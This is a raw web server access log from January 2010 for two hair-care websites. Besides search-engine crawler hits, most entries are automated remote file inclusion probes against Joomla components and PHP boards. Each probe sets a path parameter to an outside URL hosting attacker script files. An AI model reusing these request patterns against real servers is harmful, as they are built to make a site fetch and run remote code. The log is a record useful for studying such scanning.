123.125.156.197 - - [12/Jan/2010:09:35:36 -0800] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; .NET CLR 1.1.4322)" "growlonghairfast.com"
123.125.156.143 - - [12/Jan/2010:09:35:38 -0800] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; .NET CLR 1.1.4322)" "growlonghairfast.com"
123.125.156.131 - - [12/Jan/2010:09:35:39 -0800] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; .NET CLR 1.1.4322)" "growlonghairfast.com"
123.125.156.143 - - [12/Jan/2010:09:36:03 -0800] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; .NET CLR 1.1.4322)" "growlonghairfast.com"
211.138.124.202 - - [12/Jan/2010:09:36:04 -0800] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; .NET CLR 1.1.4322)" "growlonghairfast.com"
60.217.248.134 - - [12/Jan/2010:09:36:05 -0800] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; .NET CLR 1.1.4322)" "growlonghairfast.com"
60.217.248.130 - - [12/Jan/2010:09:36:07 -0800] "GET / HTTP/1.1" 200 926 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; .NET CLR 1.1.4322)" "growlonghairfast.com"
119.63.198.59 - - [12/Jan/2010:09:39:57 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "growlonghairfast.com"
210.117.228.70 - - [12/Jan/2010:09:40:44 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
210.117.228.70 - - [12/Jan/2010:09:40:44 -0800] "GET /logs/access_091005.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
210.117.228.70 - - [12/Jan/2010:09:40:44 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
94.136.50.169 - - [12/Jan/2010:09:41:29 -0800] "GET /logs/access.log%20%20/include/write.php?dir=http://www.stjohns4kids.com/siteadmin/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
94.136.50.169 - - [12/Jan/2010:09:41:29 -0800] "GET /include/write.php?dir=http://www.stjohns4kids.com/siteadmin/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
94.136.50.169 - - [12/Jan/2010:09:41:30 -0800] "GET /logs/include/write.php?dir=http://www.stjohns4kids.com/siteadmin/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
210.117.228.70 - - [12/Jan/2010:09:42:14 -0800] "GET /logs/access_091005.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
210.117.228.70 - - [12/Jan/2010:09:42:14 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
210.117.228.70 - - [12/Jan/2010:09:42:14 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
94.136.50.169 - - [12/Jan/2010:09:42:33 -0800] "GET /include/write.php?dir=http://www.stjohns4kids.com/siteadmin/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
94.136.50.169 - - [12/Jan/2010:09:42:33 -0800] "GET /logs/include/write.php?dir=http://www.stjohns4kids.com/siteadmin/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
94.136.50.169 - - [12/Jan/2010:09:42:33 -0800] "GET /logs/access.log%20%20/include/write.php?dir=http://www.stjohns4kids.com/siteadmin/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.149.207.114 - - [12/Jan/2010:09:48:08 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.149.207.114 - - [12/Jan/2010:09:48:08 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.149.207.114 - - [12/Jan/2010:09:48:09 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.195.115.155 - - [12/Jan/2010:09:50:04 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "freehairsecrets.com"
67.195.115.155 - - [12/Jan/2010:09:50:05 -0800] "GET /freehairsecretsphp/viewtopic.php?p=16721 HTTP/1.0" 200 333 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "freehairsecrets.com"
61.106.21.45 - - [12/Jan/2010:09:51:33 -0800] "GET /logs/access.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.agroktimata.gr/components/com_virtuemart/shop_image/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.106.21.45 - - [12/Jan/2010:09:51:33 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.agroktimata.gr/components/com_virtuemart/shop_image/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.106.21.45 - - [12/Jan/2010:09:51:33 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.agroktimata.gr/components/com_virtuemart/shop_image/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.106.21.45 - - [12/Jan/2010:09:52:00 -0800] "GET /logs/access.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.agroktimata.gr/components/com_virtuemart/shop_image/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.106.21.45 - - [12/Jan/2010:09:52:00 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.agroktimata.gr/components/com_virtuemart/shop_image/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.106.21.45 - - [12/Jan/2010:09:52:00 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.agroktimata.gr/components/com_virtuemart/shop_image/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.141.91.138 - - [12/Jan/2010:09:54:42 -0800] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.141.91.138 - - [12/Jan/2010:09:54:42 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.141.91.138 - - [12/Jan/2010:09:54:42 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.181.7.93 - - [12/Jan/2010:09:54:49 -0800] "GET /freehairsecretsphp/viewtopic.php?p=12788 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.freehairsecrets.com"
220.181.7.124 - - [12/Jan/2010:09:55:12 -0800] "GET /freehairsecretsphp/viewtopic.php?p=13992 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "growlonghairfast.com"
94.136.50.169 - - [12/Jan/2010:09:56:51 -0800] "GET /logs/access.log/include/write.php?dir=http://www.stjohns4kids.com/siteadmin/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
94.136.50.169 - - [12/Jan/2010:09:57:43 -0800] "GET /logs/access.log/include/write.php?dir=http://www.stjohns4kids.com/siteadmin/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
112.216.36.174 - - [12/Jan/2010:09:58:18 -0800] "GET /logs/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
112.216.36.174 - - [12/Jan/2010:09:58:18 -0800] "GET /logs/access_091005.log%20%20/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
112.216.36.174 - - [12/Jan/2010:09:58:18 -0800] "GET /show_image_in_imgtag.php?mosConfig_absolute_path=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
112.216.36.174 - - [12/Jan/2010:09:58:23 -0800] "GET /logs/access.log%20%20/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
112.216.36.174 - - [12/Jan/2010:09:58:41 -0800] "GET /show_image_in_imgtag.php?mosConfig_absolute_path=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
112.216.36.174 - - [12/Jan/2010:09:58:41 -0800] "GET /logs/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
112.216.36.174 - - [12/Jan/2010:09:58:41 -0800] "GET /logs/access_091005.log%20%20/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
112.216.36.174 - - [12/Jan/2010:09:58:47 -0800] "GET /logs/access.log%20%20/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.181.7.117 - - [12/Jan/2010:09:58:48 -0800] "GET /freehairsecretsphp/viewtopic.php?p=18836 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.freehairsecrets.com"
77.88.25.28 - - [12/Jan/2010:09:59:53 -0800] "GET /logs/access_090706.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
67.15.24.16 - - [12/Jan/2010:10:01:01 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.15.24.16 - - [12/Jan/2010:10:01:02 -0800] "GET /logs/access.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.15.24.16 - - [12/Jan/2010:10:01:02 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.106.21.45 - - [12/Jan/2010:10:03:03 -0800] "GET /logs/access.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.agroktimata.gr/components/com_virtuemart/shop_image/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.181.94.213 - - [12/Jan/2010:10:03:11 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "-" "growlonghairfast.com"
210.117.228.70 - - [12/Jan/2010:10:03:33 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
210.117.228.70 - - [12/Jan/2010:10:03:33 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
210.117.228.70 - - [12/Jan/2010:10:03:33 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.181.94.213 - - [12/Jan/2010:10:04:02 -0800] "GET /freehairsecretsphp/viewtopic.php?p=13850 HTTP/1.1" 200 349 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "growlonghairfast.com"
61.106.21.45 - - [12/Jan/2010:10:06:02 -0800] "GET /logs/access.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.agroktimata.gr/components/com_virtuemart/shop_image/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
94.102.63.60 - - [12/Jan/2010:10:06:49 -0800] "GET / HTTP/1.0" 200 910 "http://aimtrust.com/aim/r/60008" "Opera/9.00 (Windows NT 5.1; U; en)" "growlonghairfast.com"
124.0.94.62 - - [12/Jan/2010:10:07:35 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
124.0.94.62 - - [12/Jan/2010:10:07:36 -0800] "GET /logs/access.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
124.0.94.62 - - [12/Jan/2010:10:07:36 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.181.7.24 - - [12/Jan/2010:10:10:32 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "growlonghairfast.com"
78.159.32.218 - - [12/Jan/2010:10:21:54 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://community.fitnessanywhere.com/members/Order_5F00_AcTos_5F00_Online.aspx" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.01" "growlonghairfast.com"
78.159.32.218 - - [12/Jan/2010:10:21:54 -0800] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.01" "growlonghairfast.com"
67.15.24.16 - - [12/Jan/2010:10:22:48 -0800] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.145.29.142 - - [12/Jan/2010:10:31:08 -0800] "GET /bbs//skin/zero_vote/login.php?dir=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.145.29.142 - - [12/Jan/2010:10:31:08 -0800] "GET /logs//bbs//skin/zero_vote/login.php?dir=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.145.29.142 - - [12/Jan/2010:10:31:08 -0800] "GET /logs/access.log//bbs//skin/zero_vote/login.php?dir=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.195.115.155 - - [12/Jan/2010:10:33:23 -0800] "GET /?M=A HTTP/1.0" 200 910 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "freehairsecrets.com"
209.202.168.79 - - [12/Jan/2010:10:44:57 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "GingerCrawler/1.0 (Language Assistant for Dyslexics; www.gingersoftware.com/crawler_agent.htm; support at ginger software dot com)" "www.growlonghairfast.com"
209.202.168.79 - - [12/Jan/2010:10:44:57 -0800] "GET /logs/ HTTP/1.0" 200 4783 "-" "GingerCrawler/1.0 (Language Assistant for Dyslexics; www.gingersoftware.com/crawler_agent.htm; support at ginger software dot com)" "www.growlonghairfast.com"
69.16.230.82 - - [12/Jan/2010:10:45:24 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.o-ta.com.tw//appserv/joh1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.16.230.82 - - [12/Jan/2010:10:45:24 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.o-ta.com.tw//appserv/joh1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.16.230.82 - - [12/Jan/2010:10:45:24 -0800] "GET /logs/access.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.o-ta.com.tw//appserv/joh1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.195.115.155 - - [12/Jan/2010:10:45:51 -0800] "GET /freehairsecretsphp/viewtopic.php?p=12128 HTTP/1.0" 200 333 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "freehairsecrets.com"
220.181.94.229 - - [12/Jan/2010:10:48:09 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "-" "freehairsecrets.com"
124.0.94.62 - - [12/Jan/2010:10:50:24 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
124.0.94.62 - - [12/Jan/2010:10:50:24 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
124.0.94.62 - - [12/Jan/2010:10:50:24 -0800] "GET /logs/access.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.181.94.229 - - [12/Jan/2010:10:54:08 -0800] "GET /freehairsecretsphp/viewtopic.php?p=14422 HTTP/1.1" 200 349 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "freehairsecrets.com"
121.149.207.114 - - [12/Jan/2010:10:56:53 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/errors.php?error=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.149.207.114 - - [12/Jan/2010:10:56:53 -0800] "GET /components/com_virtuemart/errors.php?error=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.149.207.114 - - [12/Jan/2010:10:56:53 -0800] "GET /logs//components/com_virtuemart/errors.php?error=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.149.207.114 - - [12/Jan/2010:10:57:01 -0800] "GET /logs/access_091005.log%20%20//components/com_virtuemart/errors.php?error=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.149.207.114 - - [12/Jan/2010:10:57:08 -0800] "GET /components/com_virtuemart/errors.php?error=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.149.207.114 - - [12/Jan/2010:10:57:08 -0800] "GET /logs//components/com_virtuemart/errors.php?error=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.149.207.114 - - [12/Jan/2010:10:57:08 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/errors.php?error=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.149.207.114 - - [12/Jan/2010:10:58:00 -0800] "GET /logs/access_091005.log%20%20//components/com_virtuemart/errors.php?error=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.122.26.58 - - [12/Jan/2010:10:58:42 -0800] "GET /include/write.php?dir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.122.26.58 - - [12/Jan/2010:10:58:42 -0800] "GET /logs//include/write.php?dir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.122.26.58 - - [12/Jan/2010:10:58:42 -0800] "GET /logs/access.log%20%20//include/write.php?dir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
217.114.235.16 - - [12/Jan/2010:11:10:02 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "www.freehairsecrets.com"
66.249.65.104 - - [12/Jan/2010:11:10:19 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "freehairsecrets.com"
218.145.66.236 - - [12/Jan/2010:11:19:00 -0800] "GET /logs//components/com_virtuemart/errors.php?error=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.145.66.236 - - [12/Jan/2010:11:19:00 -0800] "GET /components/com_virtuemart/errors.php?error=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.145.66.236 - - [12/Jan/2010:11:19:00 -0800] "GET /logs/access.log//components/com_virtuemart/errors.php?error=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.149.207.114 - - [12/Jan/2010:11:20:01 -0800] "GET /logs//components/com_virtuemart/errors.php?error=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.149.207.114 - - [12/Jan/2010:11:20:01 -0800] "GET /components/com_virtuemart/errors.php?error=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.149.207.114 - - [12/Jan/2010:11:20:01 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/errors.php?error=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.253.25.15 - - [12/Jan/2010:11:20:20 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.253.25.15 - - [12/Jan/2010:11:20:20 -0800] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.253.25.15 - - [12/Jan/2010:11:20:20 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.80.108.81 - - [12/Jan/2010:11:22:22 -0800] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
220.80.108.81 - - [12/Jan/2010:11:22:22 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 200 926 "-" "libwww-perl/5.833" "www.freehairsecrets.com"
220.80.108.81 - - [12/Jan/2010:11:22:23 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 200 4805 "-" "libwww-perl/5.833" "www.freehairsecrets.com"
218.145.66.236 - - [12/Jan/2010:11:22:52 -0800] "GET /logs/access_091005.log//components/com_virtuemart/errors.php?error=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.145.66.236 - - [12/Jan/2010:11:22:53 -0800] "GET /logs//components/com_virtuemart/errors.php?error=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.145.66.236 - - [12/Jan/2010:11:22:54 -0800] "GET /components/com_virtuemart/errors.php?error=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.145.66.236 - - [12/Jan/2010:11:24:57 -0800] "GET /components/com_virtuemart/errors.php?error=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.145.66.236 - - [12/Jan/2010:11:25:02 -0800] "GET /logs/access_091005.log%20%20//components/com_virtuemart/errors.php?error=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.145.66.236 - - [12/Jan/2010:11:25:02 -0800] "GET /logs//components/com_virtuemart/errors.php?error=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.249.65.83 - - [12/Jan/2010:11:43:59 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.growlonghairfast.com"
125.128.28.202 - - [12/Jan/2010:11:45:53 -0800] "GET /logs//skin/ggambo7002_board/comment_modify.php?dir=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.128.28.202 - - [12/Jan/2010:11:45:54 -0800] "GET /logs/access.log%20%20//skin/ggambo7002_board/comment_modify.php?dir=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.128.28.202 - - [12/Jan/2010:11:45:55 -0800] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.128.28.202 - - [12/Jan/2010:11:45:56 -0800] "GET /logs//skin/ggambo7002_board/comment_modify.php?dir=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
